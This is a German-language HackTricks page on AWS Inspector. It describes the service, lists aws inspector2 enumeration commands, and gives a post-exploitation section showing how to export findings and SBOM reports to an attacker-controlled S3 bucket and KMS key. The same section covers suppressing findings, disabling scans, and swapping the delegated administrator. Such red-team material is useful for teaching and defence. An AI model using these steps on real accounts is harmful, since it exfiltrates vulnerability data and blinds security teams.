Skip to content

Latest commit

 

History

History
397 lines (304 loc) · 27.4 KB

File metadata and controls

397 lines (304 loc) · 27.4 KB

AWS - Inspector Enum

AWS - Inspector Enum

{% hint style="success" %} Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Inspector

Amazon Inspector ist ein fortschrittlicher, automatisierter Schwachstellenmanagementdienst, der entwickelt wurde, um die Sicherheit Ihrer AWS-Umgebung zu verbessern. Dieser Dienst scannt kontinuierlich Amazon EC2-Instanzen, Container-Images in Amazon ECR, Amazon ECS und AWS Lambda-Funktionen auf Schwachstellen und unbeabsichtigte Netzwerkaussetzungen. Durch die Nutzung einer robusten Schwachstellen-Intelligenzdatenbank bietet Amazon Inspector detaillierte Ergebnisse, einschließlich Schweregraden und Empfehlungen zur Behebung, die Organisationen helfen, Sicherheitsrisiken proaktiv zu identifizieren und zu beheben. Dieser umfassende Ansatz gewährleistet eine verstärkte Sicherheitslage über verschiedene AWS-Dienste hinweg und unterstützt die Einhaltung von Vorschriften und das Risikomanagement.

Schlüsselfaktoren

Ergebnisse

Ergebnisse in Amazon Inspector sind detaillierte Berichte über Schwachstellen und Aussetzungen, die während des Scans von EC2-Instanzen, ECR-Repositorys oder Lambda-Funktionen entdeckt wurden. Basierend auf ihrem Status werden die Ergebnisse kategorisiert als:

  • Aktiv: Das Ergebnis wurde nicht behoben.
  • Geschlossen: Das Ergebnis wurde behoben.
  • Unterdrückt: Das Ergebnis wurde aufgrund von einem oder mehreren Unterdrückungsregeln mit diesem Status markiert.

Die Ergebnisse werden auch in die folgenden drei Typen kategorisiert:

  • Paket: Diese Ergebnisse beziehen sich auf Schwachstellen in Softwarepaketen, die auf Ihren Ressourcen installiert sind. Beispiele sind veraltete Bibliotheken oder Abhängigkeiten mit bekannten Sicherheitsproblemen.
  • Code: Diese Kategorie umfasst Schwachstellen, die im Code von Anwendungen gefunden werden, die auf Ihren AWS-Ressourcen ausgeführt werden. Häufige Probleme sind Programmierfehler oder unsichere Praktiken, die zu Sicherheitsverletzungen führen könnten.
  • Netzwerk: Netzwerk-Ergebnisse identifizieren potenzielle Aussetzungen in Netzwerkkonfigurationen, die von Angreifern ausgenutzt werden könnten. Dazu gehören offene Ports, unsichere Netzwerkprotokolle und falsch konfigurierte Sicherheitsgruppen.

Filter und Unterdrückungsregeln

Filter und Unterdrückungsregeln in Amazon Inspector helfen, Ergebnisse zu verwalten und zu priorisieren. Filter ermöglichen es Ihnen, Ergebnisse basierend auf bestimmten Kriterien wie Schweregrad oder Ressourcentyp zu verfeinern. Unterdrückungsregeln ermöglichen es Ihnen, bestimmte Ergebnisse zu unterdrücken, die als geringes Risiko angesehen werden, bereits gemindert wurden oder aus anderen wichtigen Gründen, um zu verhindern, dass sie Ihre Sicherheitsberichte überladen und Ihnen zu ermöglichen, sich auf kritischere Probleme zu konzentrieren.

Software-Bill-of-Materials (SBOM)

Eine Software-Bill-of-Materials (SBOM) in Amazon Inspector ist eine exportierbare verschachtelte Inventarliste, die alle Komponenten innerhalb eines Softwarepakets, einschließlich Bibliotheken und Abhängigkeiten, detailliert. SBOMs helfen, Transparenz in die Software-Lieferkette zu bringen, was ein besseres Schwachstellenmanagement und Compliance ermöglicht. Sie sind entscheidend für die Identifizierung und Minderung von Risiken, die mit Open-Source- und Drittanbieter-Softwarekomponenten verbunden sind.

Hauptmerkmale

Ergebnisse exportieren

Amazon Inspector bietet die Möglichkeit, Ergebnisse in Amazon S3-Buckets, Amazon EventBridge und AWS Security Hub zu exportieren, was es Ihnen ermöglicht, detaillierte Berichte über identifizierte Schwachstellen und Aussetzungen für eine weitere Analyse oder zum Teilen zu einem bestimmten Datum und Zeitpunkt zu erstellen. Diese Funktion unterstützt verschiedene Ausgabeformate wie CSV und JSON, was die Integration mit anderen Tools und Systemen erleichtert. Die Exportfunktionalität ermöglicht die Anpassung der in den Berichten enthaltenen Daten, sodass Sie Ergebnisse basierend auf bestimmten Kriterien wie Schweregrad, Ressourcentyp oder Datumsbereich filtern und standardmäßig alle Ihre Ergebnisse im aktuellen AWS-Region mit einem aktiven Status einbeziehen können.

Beim Exportieren von Ergebnissen ist ein Schlüsselverwaltungsdienst (KMS)-Schlüssel erforderlich, um die Daten während des Exports zu verschlüsseln. KMS-Schlüssel stellen sicher, dass die exportierten Ergebnisse vor unbefugtem Zugriff geschützt sind und bieten eine zusätzliche Sicherheitsebene für sensible Schwachstelleninformationen.

Scannen von Amazon EC2-Instanzen

Amazon Inspector bietet robuste Scanfunktionen für Amazon EC2-Instanzen, um Schwachstellen und Sicherheitsprobleme zu erkennen. Inspector verglich extrahierte Metadaten von der EC2-Instanz mit Regeln aus Sicherheitsberatungen, um Paket-Schwachstellen und Netzwerk-Erreichbarkeitsprobleme zu erzeugen. Diese Scans können durch agentenbasierte oder agentenlose Methoden durchgeführt werden, abhängig von der Konfiguration der Scanmodus-Einstellungen Ihres Kontos.

  • Agentenbasiert: Nutzt den AWS Systems Manager (SSM)-Agenten, um umfassende Scans durchzuführen. Diese Methode ermöglicht eine umfassende Datensammlung und -analyse direkt von der Instanz.
  • Agentenlos: Bietet eine leichte Alternative, die keine Installation eines Agenten auf der Instanz erfordert, indem ein EBS-Snapshot jedes Volumes der EC2-Instanz erstellt, nach Schwachstellen sucht und ihn dann löscht; nutzt die vorhandene AWS-Infrastruktur für Scans.

Der Scanmodus bestimmt, welche Methode verwendet wird, um EC2-Scans durchzuführen:

  • Agentenbasiert: Beinhaltet die Installation des SSM-Agenten auf EC2-Instanzen für eine tiefgehende Inspektion.
  • Hybrides Scannen: Kombiniert sowohl agentenbasierte als auch agentenlose Methoden, um die Abdeckung zu maximieren und die Leistungseinbußen zu minimieren. In den EC2-Instanzen, auf denen der SSM-Agent installiert ist, führt Inspector einen agentenbasierten Scan durch, und für diejenigen, auf denen kein SSM-Agent vorhanden ist, wird der durchgeführte Scan agentenlos sein.

Ein weiteres wichtiges Merkmal ist die tiefgehende Inspektion für EC2-Linux-Instanzen. Diese Funktion bietet eine gründliche Analyse der Software und Konfiguration von EC2-Linux-Instanzen und liefert detaillierte Schwachstellenbewertungen, einschließlich Betriebssystem-Schwachstellen, Anwendungs-Schwachstellen und Fehlkonfigurationen, um eine umfassende Sicherheitsbewertung sicherzustellen. Dies wird durch die Inspektion von benutzerdefinierten Pfaden und allen ihren Unterverzeichnissen erreicht. Standardmäßig scannt Amazon Inspector Folgendes, aber jedes Mitgliedskonto kann bis zu 5 weitere benutzerdefinierte Pfade definieren, und jeder delegierte Administrator bis zu 10:

  • /usr/lib
  • /usr/lib64
  • /usr/local/lib
  • /usr/local/lib64

Scannen von Amazon ECR-Container-Images

Amazon Inspector bietet robuste Scanfunktionen für Amazon Elastic Container Registry (ECR)-Container-Images, um sicherzustellen, dass Paket-Schwachstellen effizient erkannt und verwaltet werden.

  • Basis-Scanning: Dies ist ein schneller und leichter Scan, der bekannte OS-Paket-Schwachstellen in Container-Images mithilfe eines standardisierten Regelwerks aus dem Open-Source-Projekt Clair identifiziert. Mit dieser Scan-Konfiguration werden Ihre Repositorys beim Push oder durch manuelle Scans gescannt.
  • Erweitertes Scannen: Diese Option fügt die kontinuierliche Scanfunktion zusätzlich zum Push-Scan hinzu. Das erweiterte Scannen geht tiefer in die Schichten jedes Container-Images, um Schwachstellen in OS-Paketen und in Programmiersprachen-Paketen mit höherer Genauigkeit zu identifizieren. Es analysiert sowohl das Basis-Image als auch alle zusätzlichen Schichten und bietet einen umfassenden Überblick über potenzielle Sicherheitsprobleme.

Scannen von Amazon Lambda-Funktionen

Amazon Inspector umfasst umfassende Scanfunktionen für AWS Lambda-Funktionen und deren Schichten, um die Sicherheit und Integrität serverloser Anwendungen zu gewährleisten. Inspector bietet zwei Arten von Scans für Lambda-Funktionen:

  • Lambda-Standard-Scanning: Diese Standardfunktion identifiziert Software-Schwachstellen in den Anwendungs-Paketabhängigkeiten, die zu Ihrer Lambda-Funktion und den Schichten hinzugefügt wurden. Wenn Ihre Funktion beispielsweise eine Version einer Bibliothek wie python-jwt mit einer bekannten Schwachstelle verwendet, wird ein Ergebnis generiert.
  • Lambda-Code-Scanning: Analysiert benutzerdefinierten Anwendungscode auf Sicherheitsprobleme und erkennt Schwachstellen wie Injektionsfehler, Datenlecks, schwache Kryptografie und fehlende Verschlüsselung. Es erfasst Code-Snippets, die erkannte Schwachstellen hervorheben, wie z. B. hardcodierte Anmeldeinformationen. Ergebnisse enthalten detaillierte Vorschläge zur Behebung und Code-Snippets zur Behebung der Probleme.

Center for Internet Security (CIS) Scans

Amazon Inspector umfasst CIS-Scans, um die Betriebssysteme von Amazon EC2-Instanzen mit den Best-Practice-Empfehlungen des Center for Internet Security (CIS) zu benchmarken. Diese Scans stellen sicher, dass die Konfigurationen den branchenüblichen Sicherheitsgrundlagen entsprechen.

  • Konfiguration: CIS-Scans bewerten, ob die Systemkonfigurationen bestimmten CIS-Benchmark-Empfehlungen entsprechen, wobei jeder Check mit einer CIS-Check-ID und einem Titel verknüpft ist.
  • Ausführung: Scans werden basierend auf Instanz-Tags und definierten Zeitplänen durchgeführt oder geplant.
  • Ergebnisse: Die Ergebnisse nach dem Scan zeigen an, welche Checks bestanden, übersprungen oder fehlgeschlagen sind und bieten Einblicke in die Sicherheitslage jeder Instanz.

Enumeration

# Administrator and member accounts #

## Retrieve information about the AWS Inpsector delegated administrator for your organization (ReadOnlyAccess policy is enough for this)
aws inspector2 get-delegated-admin-account

## List the members who are associated with the AWS Inspector administrator account (ReadOnlyAccess policy is enough for this)
aws inspector2 list-members [--only-associated | --no-only-associated]
## Retrieve information about a member account (ReadOnlyAccess policy is enough for this)
aws inspector2 get-member --account-id <value>
## Retrieve the status of AWS accounts within your environment (ReadOnlyAccess policy is enough for this)
aws inspector2 batch-get-account-status [--account-ids <value>]
## Retrieve the free trial status for the specified accounts (ReadOnlyAccess policy is enough for this)
aws inspector2 batch-get-free-trial-info --account-ids <value>
## Retrieve the EC2 Deep Inspection status for the member accounts (Requires to be the delegated administrator)
aws inspector2 batch-get-member-ec2-deep-inspection-status [--account-ids <value>]

## List an account's permissions associated with AWS Inspector
aws inspector2 list-account-permissions

# Findings #

## List a subset of information of the findings for your envionment (ReadOnlyAccess policy is enough for this)
aws inspector2 list-findings
## Retrieve vulnerability intelligence details for the specified findings
aws inspector2 batch-get-finding-details --finding-arns <value>
## List statistical and aggregated finding data (ReadOnlyAccess policy is enough for this)
aws inspector2 list-finding-aggregations --aggregation-type <FINDING_TYPE | PACKAGE | TITLE | REPOSITORY | AMI | AWS_EC2_INSTANCE | AWS_ECR_CONTAINER | IMAGE_LAYER\
| ACCOUNT AWS_LAMBDA_FUNCTION | LAMBDA_LAYER> [--account-ids <value>]
## Retrieve code snippet information about one or more specified code vulnerability findings
aws inspector2 batch-get-code-snippet --finding-arns <value>
## Retrieve the status for the specified findings report (ReadOnlyAccess policy is enough for this)
aws inspector2 get-findings-report-status --report-id <value>

# CIS #

## List CIS scan configurations (ReadOnlyAccess policy is enough for this)
aws inspector2 list-cis-scan-configurations
## List the completed CIS scans (ReadOnlyAccess policy is enough for this)
aws inspector2 list-cis-scans
## Retrieve a report from a completed CIS scan
aws inspector2 get-cis-scan-report --scan-arn <value> [--target-accounts <value>]
## Retrieve details about the specific CIS scan over the specified resource
aws inspector2 get-cis-scan-result-details --account-id <value> --scan-arn <value> --target-resource-id <value>
## List CIS scan results broken down by check
aws inspector2 list-cis-scan-results-aggregated-by-checks --scan-arn <value>
## List CIS scan results broken down by target resource
aws inspector2 list-cis-scan-results-aggregated-by-target-resource --scan-arn <value>

# Configuration #

## Describe AWS Inspector settings for AWS Organization (ReadOnlyAccess policy is enough for this)
aws inspector2 describe-organization-configuration
## Retrieve the configuration settings about EC2 scan and ECR re-scan
aws inspector2 get-configuration
## Retrieve EC2 Deep Inspection configuration associated with your account
aws inspector2 get-ec2-deep-inspection-configuration

# Miscellaneous #

## Retrieve the details of a Software Bill of Materials (SBOM) report
aws inspector2 get-sbom-export --report-id <value>

## Retrieve the coverage details for the specified vulnerabilities
aws inspector2 search-vulnerabilities --filter-criteria <vulnerabilityIds=id1,id2..>

## Retrieve the tags attached to the specified resource
aws inspector2 list-tags-for-resource --resource-arn <value>

## Retrieve the AWS KMS key used to encrypt the specified code snippets
aws inspector2 get-encryption-key --resource-type <AWS_EC2_INSTANCE | AWS_ECR_CONTAINER_IMAGE | AWS_ECR_REPOSITORY | AWS_LAMBDA_FUNCTION> --scan-type <NETWORK | PACKAGE | CODE>

## List the filters associated to your AWS account
aws inspector2 list-filters

## List the types of statistics AWS Inspector can generate (ReadOnlyAccess policy is enough for this)
aws inspector2 list-coverage
## Retrieve statistical data and about the resources AWS Inspector monitors (ReadOnlyAccess policy is enough for this)
aws inspector2 list-coverage-statistics

## List the aggregated usage total over the last 30 days
aws inspector2 list-usage-totals [--account-ids <value>]

### INSPECTOR CLASSIC ###

## Assessments info, there is a "describe" action for each one to get more info
aws inspector list-assessment-runs
aws inspector list-assessment-targets
aws inspector list-assessment-templates
aws inspector list-event-subscriptions

## Get findings
aws inspector list-findings

## Get exclusions
aws inspector list-exclusions --assessment-run-arn <arn>

## Rule packages
aws inspector list-rules-packages

Post Exploitation

{% hint style="success" %} Aus der Perspektive eines Angreifers kann dieser Dienst dem Angreifer helfen, Schwachstellen und Netzwerkexpositionen zu finden, die ihm helfen könnten, andere Instanzen/Container zu kompromittieren.

Ein Angreifer könnte jedoch auch daran interessiert sein, diesen Dienst zu stören, sodass das Opfer Schwachstellen (alle oder spezifische) nicht sehen kann. {% endhint %}

inspector2:CreateFindingsReport, inspector2:CreateSBOMReport

Ein Angreifer könnte detaillierte Berichte über Schwachstellen oder Software-Bill of Materials (SBOMs) erstellen und diese aus Ihrer AWS-Umgebung exfiltrieren. Diese Informationen könnten ausgenutzt werden, um spezifische Schwächen, veraltete Software oder unsichere Abhängigkeiten zu identifizieren, was gezielte Angriffe ermöglicht.

# Findings report
aws inspector2 create-findings-report --report-format <CSV | JSON> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--filter-criteria <value>]
# SBOM report
aws inspector2 create-sbom-report --report-format <CYCLONEDX_1_4 | SPDX_2_3> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--resource-filter-criteria <value>]

Das folgende Beispiel zeigt, wie man alle aktiven Befunde von Amazon Inspector in einen von einem Angreifer kontrollierten Amazon S3-Bucket mit einem von einem Angreifer kontrollierten Amazon KMS-Schlüssel exfiltriert:

  1. Erstellen Sie einen Amazon S3-Bucket und fügen Sie eine Richtlinie hinzu, damit er vom Opfer Amazon Inspector zugänglich ist:
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "allow-inspector",
"Effect": "Allow",
"Principal": {
"Service": "inspector2.amazonaws.com"
},
"Action": [
"s3:PutObject",
"s3:PutObjectAcl",
"s3:AbortMultipartUpload"
],
"Resource": "arn:aws:s3:::inspector-findings/*",
"Condition": {
"StringEquals": {
"aws:SourceAccount": "<victim-account-id>"
},
"ArnLike": {
"aws:SourceArn": "arn:aws:inspector2:us-east-1:<victim-account-id>:report/*"
}
}
}
]
}
  1. Erstellen Sie einen Amazon KMS-Schlüssel und fügen Sie eine Richtlinie hinzu, damit er vom Amazon Inspector des Opfers verwendet werden kann:
{
"Version": "2012-10-17",
"Id": "key-policy",
"Statement": [
{
...
},
{
"Sid": "Allow victim Amazon Inspector to use the key",
"Effect": "Allow",
"Principal": {
"Service": "inspector2.amazonaws.com"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey"
],
"Resource": "*",
"Condition": {
"StringEquals": {
"aws:SourceAccount": "<victim-account-id>"
}
}
}
]
}
  1. Führen Sie den Befehl aus, um den Bericht über die Ergebnisse zu erstellen und ihn exfiltrieren:
aws --region us-east-1 inspector2 create-findings-report --report-format CSV --s3-destination bucketName=<attacker-bucket-name>,keyPrefix=exfiltration_,kmsKeyArn=arn:aws:kms:us-east-1:123456789012:key/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f
  • Potenzielle Auswirkungen: Erstellung und Exfiltration detaillierter Berichte über Schwachstellen und Software, Einblicke in spezifische Schwachstellen und Sicherheitsanfälligkeiten gewinnen.

inspector2:CancelFindingsReport, inspector2:CancelSbomExport

Ein Angreifer könnte die Erstellung des angegebenen Berichts über Schwachstellen oder des SBOM-Berichts abbrechen, wodurch Sicherheitsteams daran gehindert werden, rechtzeitig Informationen über Schwachstellen und Software-Bill of Materials (SBOMs) zu erhalten, was die Erkennung und Behebung von Sicherheitsproblemen verzögert.

# Cancel findings report generation
aws inspector2 cancel-findings-report --report-id <value>
# Cancel SBOM report generatiom
aws inspector2 cancel-sbom-export --report-id <value>
  • Potenzielle Auswirkungen: Störung der Sicherheitsüberwachung und Verhinderung einer zeitnahen Erkennung und Behebung von Sicherheitsproblemen.

inspector2:CreateFilter, inspector2:UpdateFilter, inspector2:DeleteFilter

Ein Angreifer mit diesen Berechtigungen könnte die Filterregeln manipulieren, die bestimmen, welche Schwachstellen und Sicherheitsprobleme gemeldet oder unterdrückt werden (wenn die Aktion auf SUPPRESS gesetzt ist, würde eine Unterdrückungsregel erstellt). Dies könnte kritische Schwachstellen vor Sicherheitsadministratoren verbergen und es erleichtern, diese Schwächen unentdeckt auszunutzen. Durch das Ändern oder Entfernen wichtiger Filter könnte ein Angreifer auch Lärm erzeugen, indem er das System mit irrelevanten Ergebnissen überflutet, was eine effektive Sicherheitsüberwachung und -reaktion behindert.

# Create
aws inspector2 create-filter --action <NONE | SUPPRESS> --filter-criteria <value> --name <value> [--reason <value>]
# Update
aws inspector2 update-filter --filter-arn <value> [--action <NONE | SUPPRESS>] [--filter-criteria <value>] [--reason <value>]
# Delete
aws inspector2 delete-filter --arn <value>
  • Potenzielle Auswirkungen: Verbergung oder Unterdrückung kritischer Schwachstellen oder Überflutung des Systems mit irrelevanten Ergebnissen.

inspector2:DisableDelegatedAdminAccount, (inspector2:EnableDelegatedAdminAccount & organizations:ListDelegatedAdministrators & organizations:EnableAWSServiceAccess & iam:CreateServiceLinkedRole)

Ein Angreifer könnte die Sicherheitsmanagementstruktur erheblich stören.

  • Durch Deaktivierung des delegierten Administratorkontos könnte der Angreifer das Sicherheitsteam daran hindern, auf die Amazon Inspector-Einstellungen und -Berichte zuzugreifen und diese zu verwalten.
  • Die Aktivierung eines unbefugten Administratorkontos würde es einem Angreifer ermöglichen, Sicherheitskonfigurationen zu steuern, möglicherweise Scans zu deaktivieren oder Einstellungen zu ändern, um böswillige Aktivitäten zu verbergen.

{% hint style="warning" %} Es ist erforderlich, dass das unbefugte Konto in derselben Organisation wie das Opfer ist, um der delegierte Administrator zu werden.

Damit das unbefugte Konto der delegierte Administrator werden kann, ist es auch erforderlich, dass nach der Deaktivierung des legitimen delegierten Administrators und bevor das unbefugte Konto als delegierter Administrator aktiviert wird, der legitime Administrator als delegierter Administrator aus der Organisation abgemeldet wird. Dies kann mit dem folgenden Befehl durchgeführt werden (organizations:DeregisterDelegatedAdministrator Berechtigung erforderlich): aws organizations deregister-delegated-administrator --account-id <legit-account-id> --service-principal [inspector2.amazonaws.com](http://inspector2.amazonaws.com/) {% endhint %}

# Disable
aws inspector2 disable-delegated-admin-account --delegated-admin-account-id <value>
# Enable
aws inspector2 enable-delegated-admin-account --delegated-admin-account-id <value>
  • Potenzielle Auswirkungen: Störung des Sicherheitsmanagements.

inspector2:AssociateMember, inspector2:DisassociateMember

Ein Angreifer könnte die Zuordnung von Mitgliedskonten innerhalb einer Amazon Inspector-Organisation manipulieren. Durch die Zuordnung unautorisierter Konten oder das Trennen legitimer Konten könnte ein Angreifer kontrollieren, welche Konten in Sicherheitsüberprüfungen und Berichterstattung einbezogen werden. Dies könnte dazu führen, dass kritische Konten von der Sicherheitsüberwachung ausgeschlossen werden, was es dem Angreifer ermöglicht, Schwachstellen in diesen Konten unentdeckt auszunutzen.

{% hint style="warning" %} Diese Aktion muss von dem delegierten Administrator durchgeführt werden. {% endhint %}

# Associate
aws inspector2 associate-member --account-id <value>
# Disassociate
aws inspector2 disassociate-member --account-id <value>
  • Potenzielle Auswirkungen: Ausschluss von Schlüsselkonten von Sicherheitsüberprüfungen, was die unentdeckte Ausnutzung von Schwachstellen ermöglicht.

inspector2:Disable, (inspector2:Enable & iam:CreateServiceLinkedRole)

Ein Angreifer mit der Berechtigung inspector2:Disable könnte Sicherheitsüberprüfungen für bestimmte Ressourcentypen (EC2, ECR, Lambda, Lambda-Code) über die angegebenen Konten deaktivieren, wodurch Teile der AWS-Umgebung unüberwacht und anfällig für Angriffe bleiben. Darüber hinaus könnte ein Angreifer aufgrund der Berechtigungen inspector2:Enable & iam:CreateServiceLinkedRole dann selektiv Überprüfungen wieder aktivieren, um die Erkennung verdächtiger Konfigurationen zu vermeiden.

{% hint style="warning" %} Diese Aktion muss von dem delegierten Administrator durchgeführt werden. {% endhint %}

# Disable
aws inspector2 disable --account-ids <value> [--resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}>]
# Enable
aws inspector2 enable --resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}> [--account-ids <value>]
  • Potenzielle Auswirkungen: Erstellung von blinden Flecken in der Sicherheitsüberwachung.

inspector2:UpdateOrganizationConfiguration

Ein Angreifer mit dieser Berechtigung könnte die Konfigurationen für Ihre Amazon Inspector-Organisation aktualisieren, was die standardmäßigen Scanfunktionen für neue Mitgliedskonten beeinflusst.

{% hint style="warning" %} Diese Aktion muss von dem delegierten Administrator durchgeführt werden. {% endhint %}

aws inspector2 update-organization-configuration --auto-enable <ec2=true|false,ecr=true|false,lambda=true|false,lambdaCode=true|false>
  • Potenzielle Auswirkungen: Sicherheits-Scan-Richtlinien und -Konfigurationen für die Organisation ändern.

inspector2:TagResource, inspector2:UntagResource

Ein Angreifer könnte Tags auf AWS Inspector-Ressourcen manipulieren, die entscheidend für die Organisation, Verfolgung und Automatisierung von Sicherheitsbewertungen sind. Durch das Ändern oder Entfernen von Tags könnte ein Angreifer potenziell Schwachstellen vor Sicherheits-Scans verbergen, die Compliance-Berichterstattung stören und automatisierte Behebungsprozesse beeinträchtigen, was zu unkontrollierten Sicherheitsproblemen und einer gefährdeten Systemintegrität führen könnte.

aws inspector2 tag-resource --resource-arn <value> --tags <value>
aws inspector2 untag-resource --resource-arn <value> --tag-keys <value>
  • Potenzielle Auswirkungen: Verbergen von Schwachstellen, Störung der Compliance-Berichterstattung, Störung der Sicherheitsautomatisierung und Störung der Kostenverteilung.

Referenzen

{% hint style="success" %} Lernen & Üben von AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & Üben von GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}